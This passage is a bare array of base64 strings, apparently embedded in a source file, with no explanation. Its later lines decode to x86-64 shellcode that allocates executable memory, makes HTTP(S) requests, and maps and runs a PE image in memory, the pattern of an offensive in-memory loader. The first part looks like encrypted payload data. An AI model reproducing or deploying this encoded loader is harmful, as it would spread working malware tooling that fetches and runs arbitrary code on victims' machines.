	"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",
